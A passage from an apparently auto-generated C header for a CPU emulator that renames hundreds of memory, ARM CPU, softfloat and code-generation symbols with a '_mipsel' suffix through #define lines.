address_space_get_flatview address_space_get_flatview_mipsel +#define address_space_init address_space_init_mipsel +#define address_space_init_dispatch address_space_init_dispatch_mipsel +#define address_space_lookup_region address_space_lookup_region_mipsel +#define address_space_map address_space_map_mipsel +#define address_space_read address_space_read_mipsel +#define address_space_rw address_space_rw_mipsel +#define address_space_translate address_space_translate_mipsel +#define address_space_translate_for_iotlb address_space_translate_for_iotlb_mipsel +#define address_space_translate_internal address_space_translate_internal_mipsel +#define address_space_unmap address_space_unmap_mipsel +#define address_space_update_topology address_space_update_topology_mipsel +#define address_space_update_topology_pass address_space_update_topology_pass_mipsel +#define address_space_write address_space_write_mipsel +#define addrrange_contains addrrange_contains_mipsel +#define addrrange_end addrrange_end_mipsel +#define addrrange_equal addrrange_equal_mipsel +#define addrrange_intersection addrrange_intersection_mipsel +#define addrrange_intersects addrrange_intersects_mipsel +#define addrrange_make addrrange_make_mipsel +#define adjust_endianness adjust_endianness_mipsel +#define all_helpers all_helpers_mipsel +#define alloc_code_gen_buffer alloc_code_gen_buffer_mipsel +#define alloc_entry alloc_entry_mipsel +#define always_true always_true_mipsel +#define arm1026_initfn arm1026_initfn_mipsel +#define arm1136_initfn arm1136_initfn_mipsel +#define arm1136_r2_initfn arm1136_r2_initfn_mipsel +#define arm1176_initfn arm1176_initfn_mipsel +#define arm11mpcore_initfn arm11mpcore_initfn_mipsel +#define arm926_initfn arm926_initfn_mipsel +#define arm946_initfn arm946_initfn_mipsel +#define arm_ccnt_enabled arm_ccnt_enabled_mipsel +#define arm_cp_read_zero arm_cp_read_zero_mipsel +#define arm_cp_reset_ignore arm_cp_reset_ignore_mipsel +#define arm_cpu_do_interrupt arm_cpu_do_interrupt_mipsel +#define arm_cpu_exec_interrupt arm_cpu_exec_interrupt_mipsel +#define arm_cpu_finalizefn arm_cpu_finalizefn_mipsel +#define arm_cpu_get_phys_page_debug arm_cpu_get_phys_page_debug_mipsel +#define arm_cpu_handle_mmu_fault arm_cpu_handle_mmu_fault_mipsel +#define arm_cpu_initfn arm_cpu_initfn_mipsel +#define arm_cpu_list arm_cpu_list_mipsel +#define cpu_loop_exit cpu_loop_exit_mipsel +#define arm_cpu_post_init arm_cpu_post_init_mipsel +#define arm_cpu_realizefn arm_cpu_realizefn_mipsel +#define arm_cpu_register_gdb_regs_for_features arm_cpu_register_gdb_regs_for_features_mipsel +#define arm_cpu_register_types arm_cpu_register_types_mipsel +#define cpu_resume_from_signal cpu_resume_from_signal_mipsel +#define arm_cpus arm_cpus_mipsel +#define arm_cpu_set_pc arm_cpu_set_pc_mipsel +#define arm_cp_write_ignore arm_cp_write_ignore_mipsel +#define arm_current_el arm_current_el_mipsel +#define arm_dc_feature arm_dc_feature_mipsel +#define arm_debug_excp_handler arm_debug_excp_handler_mipsel +#define arm_debug_target_el arm_debug_target_el_mipsel +#define arm_el_is_aa64 arm_el_is_aa64_mipsel +#define arm_env_get_cpu arm_env_get_cpu_mipsel +#define arm_excp_target_el arm_excp_target_el_mipsel +#define arm_excp_unmasked arm_excp_unmasked_mipsel +#define arm_feature arm_feature_mipsel +#define arm_generate_debug_exceptions arm_generate_debug_exceptions_mipsel +#define gen_intermediate_code gen_intermediate_code_mipsel +#define gen_intermediate_code_pc gen_intermediate_code_pc_mipsel +#define arm_gen_test_cc arm_gen_test_cc_mipsel +#define arm_gt_ptimer_cb arm_gt_ptimer_cb_mipsel +#define arm_gt_vtimer_cb arm_gt_vtimer_cb_mipsel +#define arm_handle_psci_call arm_handle_psci_call_mipsel +#define arm_is_psci_call arm_is_psci_call_mipsel +#define arm_is_secure arm_is_secure_mipsel +#define arm_is_secure_below_el3 arm_is_secure_below_el3_mipsel +#define arm_ldl_code arm_ldl_code_mipsel +#define arm_lduw_code arm_lduw_code_mipsel +#define arm_log_exception arm_log_exception_mipsel +#define arm_reg_read arm_reg_read_mipsel +#define arm_reg_reset arm_reg_reset_mipsel +#define arm_reg_write arm_reg_write_mipsel +#define restore_state_to_opc restore_state_to_opc_mipsel +#define arm_rmode_to_sf arm_rmode_to_sf_mipsel +#define arm_singlestep_active arm_singlestep_active_mipsel +#define tlb_fill tlb_fill_mipsel +#define tlb_flush tlb_flush_mipsel +#define tlb_flush_page tlb_flush_page_mipsel +#define tlb_set_page tlb_set_page_mipsel +#define arm_translate_init arm_translate_init_mipsel +#define arm_v7m_class_init arm_v7m_class_init_mipsel +#define arm_v7m_cpu_do_interrupt arm_v7m_cpu_do_interrupt_mipsel +#define ats_access ats_access_mipsel +#define ats_write ats_write_mipsel +#define bad_mode_switch bad_mode_switch_mipsel +#define bank_number bank_number_mipsel +#define bitmap_zero_extend bitmap_zero_extend_mipsel +#define bp_wp_matches bp_wp_matches_mipsel +#define breakpoint_invalidate breakpoint_invalidate_mipsel +#define build_page_bitmap build_page_bitmap_mipsel +#define bus_add_child bus_add_child_mipsel +#define bus_class_init bus_class_init_mipsel +#define bus_info bus_info_mipsel +#define bus_unparent bus_unparent_mipsel +#define cache_block_ops_cp_reginfo cache_block_ops_cp_reginfo_mipsel +#define cache_dirty_status_cp_reginfo cache_dirty_status_cp_reginfo_mipsel +#define cache_test_clean_cp_reginfo cache_test_clean_cp_reginfo_mipsel +#define call_recip_estimate call_recip_estimate_mipsel +#define can_merge can_merge_mipsel +#define capacity_increase capacity_increase_mipsel +#define ccsidr_read ccsidr_read_mipsel +#define check_ap check_ap_mipsel +#define check_breakpoints check_breakpoints_mipsel +#define check_watchpoints check_watchpoints_mipsel +#define cho cho_mipsel +#define clear_bit clear_bit_mipsel +#define clz32 clz32_mipsel +#define clz64 clz64_mipsel +#define cmp_flatrange_addr cmp_flatrange_addr_mipsel +#define code_gen_alloc code_gen_alloc_mipsel +#define commonNaNToFloat128 commonNaNToFloat128_mipsel +#define commonNaNToFloat16 commonNaNToFloat16_mipsel +#define commonNaNToFloat32 commonNaNToFloat32_mipsel +#define commonNaNToFloat64 commonNaNToFloat64_mipsel +#define commonNaNToFloatx80 commonNaNToFloatx80_mipsel +#define compute_abs_deadline compute_abs_deadline_mipsel +#define cond_name cond_name_mipsel +#define configure_accelerator configure_accelerator_mipsel +#define container_get container_get_mipsel +#define container_info container_info_mipsel +#define container_register_types container_register_types_mipsel +#define contextidr_write contextidr_write_mipsel +#define core_log_global_start core_log_global_start_mipsel +#define core_log_global_stop core_log_global_stop_mipsel +#define core_memory_listener core_memory_listener_mipsel +#define cortexa15_cp_reginfo cortexa15_cp_reginfo_mipsel +#define cortex_a15_initfn cortex_a15_initfn_mipsel +#define cortexa8_cp_reginfo cortexa8_cp_reginfo_mipsel +#define cortex_a8_initfn cortex_a8_initfn_mipsel +#define cortexa9_cp_reginfo cortexa9_cp_reginfo_mipsel +#define cortex_a9_initfn cortex_a9_initfn_mipsel +#define cortex_m3_initfn cortex_m3_initfn_mipsel +#define count_cpreg count_cpreg_mipsel +#define countLeadingZeros32 countLeadingZeros32_mipsel +#define countLeadingZeros64 countLeadingZeros64_mipsel +#define cp_access_ok cp_access_ok_mipsel +#define cpacr_write cpacr_write_mipsel +#define cpreg_field_is_64bit cpreg_field_is_64bit_mipsel +#define cp_reginfo cp_reginfo_mipsel +#define cpreg_key_compare cpreg_key_compare_mipsel +#define cpreg_make_keylist cpreg_make_keylist_mipsel +#define cp_reg_reset cp_reg_reset_mipsel +#define cpreg_to_kvm_id cpreg_to_kvm_id_mipsel +#define cpsr_read cpsr_read_mipsel +#define cpsr_write cpsr_write_mipsel +#define cptype_valid cptype_valid_mipsel +#define cpu_abort cpu_abort_mipsel +#define cpu_arm_exec cpu_arm_exec_mipsel +#define cpu_arm_gen_code cpu_arm_gen_code_mipsel +#define cpu_arm_init cpu_arm_init_mipsel +#define cpu_breakpoint_insert cpu_breakpoint_insert_mipsel +#define cpu_breakpoint_remove cpu_breakpoint_remove_mipsel +#define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_mipsel +#define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_mipsel +#define cpu_can_do_io cpu_can_do_io_mipsel +#define cpu_can_run cpu_can_run_mipsel +#define cpu_class_init cpu_class_init_mipsel +#define cpu_common_class_by_name cpu_common_class_by_name_mipsel +#define cpu_common_exec_interrupt cpu_common_exec_interrupt_mipsel +#define cpu_common_get_arch_id cpu_common_get_arch_id_mipsel +#define cpu_common_get_memory_mapping cpu_common_get_memory_mapping_mipsel +#define cpu_common_get_paging_enabled cpu_common_get_paging_enabled_mipsel +#define cpu_common_has_work cpu_common_has_work_mipsel +#define cpu_common_initfn cpu_common_initfn_mipsel +#define cpu_common_noop cpu_common_noop_mipsel +#define cpu_common_parse_features cpu_common_parse_features_mipsel +#define cpu_common_realizefn cpu_common_realizefn_mipsel +#define cpu_common_reset cpu_common_reset_mipsel +#define cpu_dump_statistics cpu_dump_statistics_mipsel +#define cpu_exec_init cpu_exec_init_mipsel +#define cpu_flush_icache_range cpu_flush_icache_range_mipsel +#define cpu_gen_init cpu_gen_init_mipsel +#define cpu_get_clock cpu_get_clock_mipsel +#define cpu_get_real_ticks cpu_get_real_ticks_mipsel +#define cpu_get_tb_cpu_state cpu_get_tb_cpu_state_mipsel +#define cpu_handle_debug_exception cpu_handle_debug_exception_mipsel +#define cpu_handle_guest_debug cpu_handle_guest_debug_mipsel +#define cpu_inb cpu_inb_mipsel +#define cpu_inl cpu_inl_mipsel +#define cpu_interrupt cpu_interrupt_mipsel +#define cpu_interrupt_handler cpu_interrupt_handler_mipsel +#define cpu_inw cpu_inw_mipsel +#define cpu_io_recompile cpu_io_recompile_mipsel +#define cpu_is_stopped cpu_is_stopped_mipsel +#define cpu_ldl_code cpu_ldl_code_mipsel +#define cpu_ldub_code cpu_ldub_code_mipsel +#define cpu_lduw_code cpu_lduw_code_mipsel +#define cpu_memory_rw_debug cpu_memory_rw_debug_mipsel +#define cpu_mmu_index cpu_mmu_index_mipsel +#define cpu_outb cpu_outb_mipsel +#define cpu_outl cpu_outl_mipsel +#define cpu_outw cpu_outw_mipsel +#define cpu_physical_memory_clear_dirty_range cpu_physical_memory_clear_dirty_range_mipsel +#define cpu_physical_memory_get_clean cpu_physical_memory_get_clean_mipsel +#define cpu_physical_memory_get_dirty cpu_physical_memory_get_dirty_mipsel +#define cpu_physical_memory_get_dirty_flag cpu_physical_memory_get_dirty_flag_mipsel +#define cpu_physical_memory_is_clean cpu_physical_memory_is_clean_mipsel +#define cpu_physical_memory_is_io cpu_physical_memory_is_io_mipsel +#define cpu_physical_memory_map cpu_physical_memory_map_mipsel +#define cpu_physical_memory_range_includes_clean cpu_physical_memory_range_includes_clean_mipsel +#define cpu_physical_memory_reset_dirty cpu_physical_memory_reset_dirty_mipsel +#define cpu_physical_memory_rw cpu_physical_memory_rw_mipsel +#define cpu_physical_memory_set_dirty_flag cpu_physical_memory_set_dirty_flag_mipsel +#define cpu_physical_memory_set_dirty_range cpu_physical_memory_set_dirty_range_mipsel +#define cpu_physical_memory_unmap cpu_physical_memory_unmap_mipsel +#define cpu_physical_memory_write_rom cpu_physical_memory_write_rom_mipsel +#define cpu_physical_memory_write_rom_internal cpu_physical_memory_write_rom_internal_mipsel +#define cpu_register cpu_register_mipsel +#define cpu_register_types cpu_register_types_mipsel +#define cpu_restore_state cpu_restore_state_mipsel +#define cpu_restore_state_from_tb cpu_restore_state_from_tb_mipsel +#define cpu_single_step cpu_single_step_mipsel +#define cpu_tb_exec cpu_tb_exec_mipsel +#define cpu_tlb_reset_dirty_all cpu_tlb_reset_dirty_all_mipsel +#define cpu_to_be64 cpu_to_be64_mipsel +#define cpu_to_le32 cpu_to_le32_mipsel +#define cpu_to_le64 cpu_to_le64_mipsel +#define cpu_type_info cpu_type_info_mipsel +#define cpu_unassigned_access cpu_unassigned_access_mipsel +#define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_mipsel +#define cpu_watchpoint_insert cpu_watchpoint_insert_mipsel +#define cpu_watchpoint_remove cpu_watchpoint_remove_mipsel +#define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_mipsel +#define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_mipsel +#define crc32c_table crc32c_table_mipsel +#define create_new_memory_mapping create_new_memory_mapping_mipsel +#define csselr_write csselr_write_mipsel +#define cto32 cto32_mipsel +#define ctr_el0_access ctr_el0_access_mipsel +#define ctz32 ctz32_mipsel +#define ctz64 ctz64_mipsel +#define dacr_write dacr_write_mipsel +#define dbgbcr_write dbgbcr_write_mipsel +#define dbgbvr_write dbgbvr_write_mipsel +#define dbgwcr_write dbgwcr_write_mipsel +#define dbgwvr_write dbgwvr_write_mipsel +#define debug_cp_reginfo debug_cp_reginfo_mipsel +#define debug_frame debug_frame_mipsel +#define debug_lpae_cp_reginfo debug_lpae_cp_reginfo_mipsel +#define define_arm_cp_regs define_arm_cp_regs_mipsel +#define define_arm_cp_regs_with_opaque define_arm_cp_regs_with_opaque_mipsel +#define define_debug_regs define_debug_regs_mipsel +#define define_one_arm_cp_reg define_one_arm_cp_reg_mipsel +#define define_one_arm_cp_reg_with_opaque define_one_arm_cp_reg_with_opaque_mipsel +#define deposit32 deposit32_mipsel +#define deposit64 deposit64_mipsel +#define deregister_tm_clones deregister_tm_clones_mipsel +#define device_class_base_init device_class_base_init_mipsel +#define device_class_init device_class_init_mipsel +#define device_finalize device_finalize_mipsel +#define device_get_realized device_get_realized_mipsel +#define device_initfn device_initfn_mipsel +#define device_post_init device_post_init_mipsel +#define device_reset device_reset_mipsel +#define device_set_realized device_set_realized_mipsel +#define device_type_info device_type_info_mipsel +#define disas_arm_insn disas_arm_insn_mipsel +#define disas_coproc_insn disas_coproc_insn_mipsel +#define disas_dsp_insn disas_dsp_insn_mipsel +#define disas_iwmmxt_insn disas_iwmmxt_insn_mipsel +#define disas_neon_data_insn disas_neon_data_insn_mipsel +#define disas_neon_ls_insn disas_neon_ls_insn_mipsel +#define disas_thumb2_insn disas_thumb2_insn_mipsel +#define disas_thumb_insn disas_thumb_insn_mipsel +#define disas_vfp_insn disas_vfp_insn_mipsel +#define disas_vfp_v8_insn disas_vfp_v8_insn_mipsel +#define do_arm_semihosting do_arm_semihosting_mipsel +#define do_clz16 do_clz16_mipsel +#define do_clz8 do_clz8_mipsel +#define do_constant_folding do_constant_folding_mipsel +#define do_constant_folding_2 do_constant_folding_2_mipsel +#define do_constant_folding_cond do_constant_folding_cond_mipsel +#define do_constant_folding_cond2 do_constant_folding_cond2_mipsel +#define do_constant_folding_cond_32 do_constant_folding_cond_32_mipsel +#define do_constant_folding_cond_64 do_constant_folding_cond_64_mipsel +#define do_constant_folding_cond_eq do_constant_folding_cond_eq_mipsel +#define do_fcvt_f16_to_f32 do_fcvt_f16_to_f32_mipsel +#define do_fcvt_f32_to_f16 do_fcvt_f32_to_f16_mipsel +#define do_ssat do_ssat_mipsel +#define do_usad do_usad_mipsel +#define do_usat do_usat_mipsel +#define do_v7m_exception_exit do_v7m_exception_exit_mipsel +#define dummy_c15_cp_reginfo dummy_c15_cp_reginfo_mipsel +#define dummy_func dummy_func_mipsel +#define dummy_section dummy_section_mipsel +#define _DYNAMIC _DYNAMIC_mipsel +#define _edata _edata_mipsel +#define _end _end_mipsel +#define end_list end_list_mipsel +#define eq128 eq128_mipsel +#define ErrorClass_lookup ErrorClass_lookup_mipsel +#define error_copy error_copy_mipsel +#define error_exit error_exit_mipsel +#define error_get_class error_get_class_mipsel +#define error_get_pretty error_get_pretty_mipsel +#define error_setg_file_open error_setg_file_open_mipsel +#define estimateDiv128To64 estimateDiv128To64_mipsel +#define estimateSqrt32 estimateSqrt32_mipsel +#define excnames excnames_mipsel +#define excp_is_internal excp_is_internal_mipsel +#define extended_addresses_enabled extended_addresses_enabled_mipsel +#define extended_mpu_ap_bits extended_mpu_ap_bits_mipsel +#define extract32 extract32_mipsel +#define extract64 extract64_mipsel +#define extractFloat128Exp extractFloat128Exp_mipsel +#define extractFloat128Frac0 extractFloat128Frac0_mipsel +#define extractFloat128Frac1 extractFloat128Frac1_mipsel +#define extractFloat128Sign extractFloat128Sign_mipsel +#define extractFloat16Exp extractFloat16Exp_mipsel +#define extractFloat16Frac extractFloat16Frac_mipsel +#define extractFloat16Sign extractFloat16Sign_mipsel +#define extractFloat32Exp extractFloat32Exp_mipsel +#define extractFloat32Frac extractFloat32Frac_mipsel +#define extractFloat32Sign extractFloat32Sign_mipsel +#define extractFloat64Exp extractFloat64Exp_mipsel +#define extractFloat64Frac extractFloat64Frac_mipsel +#define extractFloat64Sign extractFloat64Sign_mipsel +#define extractFloatx80Exp extractFloatx80Exp_mipsel +#define extractFloatx80Frac extractFloatx80Frac_mipsel +#define extractFloatx80Sign extractFloatx80Sign_mipsel +#define fcse_write fcse_write_mipsel +#define find_better_copy find_better_copy_mipsel +#define find_default_machine find_default_machine_mipsel +#define find_desc_by_name find_desc_by_name_mipsel +#define find_first_bit find_first_bit_mipsel +#define find_paging_enabled_cpu find_paging_enabled_cpu_mipsel +#define find_ram_block find_ram_block_mipsel +#define find_ram_offset find_ram_offset_mipsel +#define find_string find_string_mipsel +#define find_type find_type_mipsel +#define _fini _fini_mipsel +#define flatrange_equal flatrange_equal_mipsel +#define flatview_destroy flatview_destroy_mipsel +#define flatview_init flatview_init_mipsel +#define flatview_insert flatview_insert_mipsel +#define flatview_lookup flatview_lookup_mipsel +#define flatview_ref flatview_ref_mipsel +#define flatview_simplify flatview_simplify_mipsel +#define flatview_unref flatview_unref_mipsel +#define float128_add float128_add_mipsel +#define float128_compare float128_compare_mipsel +#define float128_compare_internal float128_compare_internal_mipsel +#define float128_compare_quiet float128_compare_quiet_mipsel +#define float128_default_nan float128_default_nan_mipsel +#define float128_div float128_div_mipsel +#define float128_eq float128_eq_mipsel +#define float128_eq_quiet float128_eq_quiet_mipsel +#define float128_is_quiet_nan float128_is_quiet_nan_mipsel +#define float128_is_signaling_nan float128_is_signaling_nan_mipsel +#define float128_le float128_le_mipsel +#define float128_le_quiet float128_le_quiet_mipsel +#define float128_lt float128_lt_mipsel +#define float128_lt_quiet float128_lt_quiet_mipsel +#define float128_maybe_silence_nan float128_maybe_silence_nan_mipsel +#define float128_mul float128_mul_mipsel +#define float128_rem float128_rem_mipsel +#define float128_round_to_int float128_round_to_int_mipsel +#define float128_scalbn float128_scalbn_mipsel +#define float128_sqrt float128_sqrt_mipsel +#define float128_sub float128_sub_mipsel +#define float128ToCommonNaN float128ToCommonNaN_mipsel +#define float128_to_float32 float128_to_float32_mipsel +#define float128_to_float64 float128_to_float64_mipsel +#define float128_to_floatx80 float128_to_floatx80_mipsel +#define float128_to_int32 float128_to_int32_mipsel +#define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_mipsel +#define float128_to_int64 float128_to_int64_mipsel +#define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_mipsel +#define float128_unordered float128_unordered_mipsel +#define float128_unordered_quiet float128_unordered_quiet_mipsel +#define float16_default_nan float16_default_nan_mipsel +#define float16_is_quiet_nan float16_is_quiet_nan_mipsel +#define float16_is_signaling_nan float16_is_signaling_nan_mipsel +#define float16_maybe_silence_nan float16_maybe_silence_nan_mipsel +#define float16ToCommonNaN float16ToCommonNaN_mipsel +#define float16_to_float32 float16_to_float32_mipsel +#define float16_to_float64 float16_to_float64_mipsel +#define float32_abs float32_abs_mipsel +#define float32_add float32_add_mipsel +#define float32_chs float32_chs_mipsel +#define float32_compare float32_compare_mipsel +#define float32_compare_internal float32_compare_internal_mipsel +#define float32_compare_quiet float32_compare_quiet_mipsel +#define float32_default_nan float32_default_nan_mipsel +#define float32_div float32_div_mipsel +#define float32_eq float32_eq_mipsel +#define float32_eq_quiet float32_eq_quiet_mipsel +#define float32_exp2 float32_exp2_mipsel +#define float32_exp2_coefficients float32_exp2_coefficients_mipsel +#define float32_is_any_nan float32_is_any_nan_mipsel +#define float32_is_infinity float32_is_infinity_mipsel +#define float32_is_neg float32_is_neg_mipsel +#define float32_is_quiet_nan float32_is_quiet_nan_mipsel +#define float32_is_signaling_nan float32_is_signaling_nan_mipsel +#define float32_is_zero float32_is_zero_mipsel +#define float32_is_zero_or_denormal float32_is_zero_or_denormal_mipsel +#define float32_le float32_le_mipsel +#define float32_le_quiet float32_le_quiet_mipsel +#define float32_log2 float32_log2_mipsel +#define float32_lt float32_lt_mipsel +#define float32_lt_quiet float32_lt_quiet_mipsel +#define float32_max float32_max_mipsel +#define float32_maxnum float32_maxnum_mipsel +#define float32_maxnummag float32_maxnummag_mipsel +#define float32_maybe_silence_nan float32_maybe_silence_nan_mipsel +#define float32_min float32_min_mipsel +#define float32_minmax float32_minmax_mipsel +#define float32_minnum float32_minnum_mipsel +#define float32_minnummag float32_minnummag_mipsel +#define float32_mul float32_mul_mipsel +#define float32_muladd float32_muladd_mipsel +#define float32_rem float32_rem_mipsel +#define float32_round_to_int float32_round_to_int_mipsel +#define float32_scalbn float32_scalbn_mipsel +#define float32_set_sign float32_set_sign_mipsel +#define float32_sqrt float32_sqrt_mipsel +#define float32_squash_input_denormal float32_squash_input_denormal_mipsel +#define float32_sub float32_sub_mipsel +#define float32ToCommonNaN float32ToCommonNaN_mipsel +#define float32_to_float128 float32_to_float128_mipsel +#define float32_to_float16 float32_to_float16_mipsel +#define float32_to_float64 float32_to_float64_mipsel +#define float32_to_floatx80 float32_to_floatx80_mipsel +#define float32_to_int16 float32_to_int16_mipsel +#define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_mipsel +#define float32_to_int32 float32_to_int32_mipsel +#define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_mipsel +#define float32_to_int64 float32_to_int64_mipsel +#define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_mipsel +#define float32_to_uint16 float32_to_uint16_mipsel +#define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_mipsel +#define float32_to_uint32 float32_to_uint32_mipsel +#define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_mipsel +#define float32_to_uint64 float32_to_uint64_mipsel +#define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_mipsel +#define float32_unordered float32_unordered_mipsel +#define float32_unordered_quiet float32_unordered_quiet_mipsel +#define float64_abs float64_abs_mipsel +#define float64_add float64_add_mipsel +#define float64_chs float64_chs_mipsel +#define float64_compare float64_compare_mipsel +#define float64_compare_internal float64_compare_internal_mipsel +#define float64_compare_quiet float64_compare_quiet_mipsel +#define float64_default_nan float64_default_nan_mipsel +#define float64_div float64_div_mipsel +#define float64_eq float64_eq_mipsel +#define float64_eq_quiet float64_eq_quiet_mipsel +#define float64_is_any_nan float64_is_any_nan_mipsel +#define float64_is_infinity float64_is_infinity_mipsel +#define float64_is_neg float64_is_neg_mipsel +#define float64_is_quiet_nan float64_is_quiet_nan_mipsel +#define float64_is_signaling_nan float64_is_signaling_nan_mipsel +#define float64_is_zero float64_is_zero_mipsel +#define float64_le float64_le_mipsel +#define float64_le_quiet float64_le_quiet_mipsel +#define float64_log2 float64_log2_mipsel +#define float64_lt float64_lt_mipsel +#define float64_lt_quiet float64_lt_quiet_mipsel +#define float64_max float64_max_mipsel +#define float64_maxnum float64_maxnum_mipsel +#define float64_maxnummag float64_maxnummag_mipsel +#define float64_maybe_silence_nan float64_maybe_silence_nan_mipsel +#define float64_min float64_min_mipsel +#define float64_minmax float64_minmax_mipsel +#define float64_minnum float64_minnum_mipsel +#define float64_minnummag float64_minnummag_mipsel +#define float64_mul float64_mul_mipsel +#define float64_muladd float64_muladd_mipsel +#define float64_rem float64_rem_mipsel +#define float64_round_to_int float64_round_to_int_mipsel +#define float64_scalbn float64_scalbn_mipsel +#define float64_set_sign float64_set_sign_mipsel +#define float64_sqrt float64_sqrt_mipsel +#define float64_squash_input_denormal float64_squash_input_denormal_mipsel +#define float64_sub float64_sub_mipsel +#define float64ToCommonNaN float64ToCommonNaN_mipsel +#define float64_to_float128 float64_to_float128_mipsel +#define float64_to_float16 float64_to_float16_mipsel +#define float64_to_float32 float64_to_float32_mipsel +#define float64_to_floatx80 float64_to_floatx80_mipsel +#define float64_to_int16 float64_to_int16_mipsel +#define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_mipsel +#define float64_to_int32 float64_to_int32_mipsel +#define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_mipsel +#define float64_to_int64 float64_to_int64_mipsel +#define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_mipsel +#define float64_to_uint16 float64_to_uint16_mipsel +#define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_mipsel +#define float64_to_uint32 float64_to_uint32_mipsel +#define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_mipsel +#define float64_to_uint64 float64_to_uint64_mipsel +#define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_mipsel +#define float64_trunc_to_int float64_trunc_to_int_mipsel +#define float64_unordered float64_unordered_mipsel +#define float64_unordered_quiet float64_unordered_quiet_mipsel +#define float_raise float_raise_mipsel +#define floatx80_add floatx80_add_mipsel +#define floatx80_compare floatx80_compare_mipsel +#define floatx80_compare_internal floatx80_compare_internal_mipsel +#define floatx80_compare_quiet floatx80_compare_quiet_mipsel +#define floatx80_default_nan floatx80_default_nan_mipsel +#define floatx80_div floatx80_div_mipsel +#define floatx80_eq floatx80_eq_mipsel +#define floatx80_eq_quiet floatx80_eq_quiet_mipsel +#define floatx80_is_quiet_nan floatx80_is_quiet_nan_mipsel +#define floatx80_is_signaling_nan floatx80_is_signaling_nan_mipsel +#define floatx80_le floatx80_le_mipsel +#define floatx80_le_quiet floatx80_le_quiet_mipsel +#define floatx80_lt floatx80_lt_mipsel +#define floatx80_lt_quiet floatx80_lt_quiet_mipsel +#define floatx80_maybe_silence_nan floatx80_maybe_silence_nan_mipsel +#define floatx80_mul floatx80_mul_mipsel +#define floatx80_rem floatx80_rem_mipsel +#define floatx80_round_to_int floatx80_round_to_int_mipsel +#define floatx80_scalbn floatx80_scalbn_mipsel +#define floatx80_sqrt floatx80_sqrt_mipsel +#define floatx80_sub floatx80_sub_mipsel +#define floatx80ToCommonNaN floatx80ToCommonNaN_mipsel +#define floatx80_to_float128 floatx80_to_float128_mipsel +#define floatx80_to_float32 floatx80_to_float32_mipsel +#define floatx80_to_float64 floatx80_to_float64_mipsel +#define floatx80_to_int32 floatx80_to_int32_mipsel +#define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_mipsel +#define floatx80_to_int64 floatx80_to_int64_mipsel +#define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_mipsel +#define floatx80_unordered floatx80_unordered_mipsel +#define floatx80_unordered_quiet floatx80_unordered_quiet_mipsel +#define flush_icache_range flush_icache_range_mipsel +#define format_string format_string_mipsel +#define fp_decode_rm fp_decode_rm_mipsel +#define frame_dummy frame_dummy_mipsel +#define free_range free_range_mipsel +#define fstat64 fstat64_mipsel +#define futex_wait futex_wait_mipsel +#define futex_wake futex_wake_mipsel +#define gen_aa32_ld16s gen_aa32_ld16s_mipsel +#define gen_aa32_ld16u gen_aa32_ld16u_mipsel +#define gen_aa32_ld32u gen_aa32_ld32u_mipsel +#define gen_aa32_ld64 gen_aa32_ld64_mipsel +#define gen_aa32_ld8s gen_aa32_ld8s_mipsel +#define gen_aa32_ld8u gen_aa32_ld8u_mipsel +#define gen_aa32_st16 gen_aa32_st16_mipsel +#define gen_aa32_st32 gen_aa32_st32_mipsel +#define gen_aa32_st64 gen_aa32_st64_mipsel +#define gen_aa32_st8 gen_aa32_st8_mipsel +#define gen_adc gen_adc_mipsel +#define gen_adc_CC gen_adc_CC_mipsel +#define gen_add16 gen_add16_mipsel +#define gen_add_carry gen_add_carry_mipsel +#define gen_add_CC gen_add_CC_mipsel +#define gen_add_datah_offset gen_add_datah_offset_mipsel +#define gen_add_data_offset gen_add_data_offset_mipsel +#define gen_addq gen_addq_mipsel +#define gen_addq_lo gen_addq_lo_mipsel +#define gen_addq_msw gen_addq_msw_mipsel +#define gen_arm_parallel_addsub gen_arm_parallel_addsub_mipsel +#define gen_arm_shift_im gen_arm_shift_im_mipsel +#define gen_arm_shift_reg gen_arm_shift_reg_mipsel +#define gen_bx gen_bx_mipsel +#define gen_bx_im gen_bx_im_mipsel +#define gen_clrex gen_clrex_mipsel +#define generate_memory_topology generate_memory_topology_mipsel +#define generic_timer_cp_reginfo generic_timer_cp_reginfo_mipsel +#define gen_exception gen_exception_mipsel +#define gen_exception_insn gen_exception_insn_mipsel +#define gen_exception_internal gen_exception_internal_mipsel +#define gen_exception_internal_insn gen_exception_internal_insn_mipsel +#define gen_exception_return gen_exception_return_mipsel +#define gen_goto_tb gen_goto_tb_mipsel +#define gen_helper_access_check_cp_reg gen_helper_access_check_cp_reg_mipsel +#define gen_helper_add_saturate gen_helper_add_saturate_mipsel +#define gen_helper_add_setq gen_helper_add_setq_mipsel +#define gen_helper_clear_pstate_ss gen_helper_clear_pstate_ss_mipsel +#define gen_helper_clz32 gen_helper_clz32_mipsel +#define gen_helper_clz64 gen_helper_clz64_mipsel +#define gen_helper_clz_arm gen_helper_clz_arm_mipsel +#define gen_helper_cpsr_read gen_helper_cpsr_read_mipsel +#define gen_helper_cpsr_write gen_helper_cpsr_write_mipsel +#define gen_helper_crc32_arm gen_helper_crc32_arm_mipsel +#define gen_helper_crc32c gen_helper_crc32c_mipsel +#define gen_helper_crypto_aese gen_helper_crypto_aese_mipsel +#define gen_helper_crypto_aesmc gen_helper_crypto_aesmc_mipsel +#define gen_helper_crypto_sha1_3reg gen_helper_crypto_sha1_3reg_mipsel +#define gen_helper_crypto_sha1h gen_helper_crypto_sha1h_mipsel +#define gen_helper_crypto_sha1su1 gen_helper_crypto_sha1su1_mipsel +#define gen_helper_crypto_sha256h gen_helper_crypto_sha256h_mipsel +#define 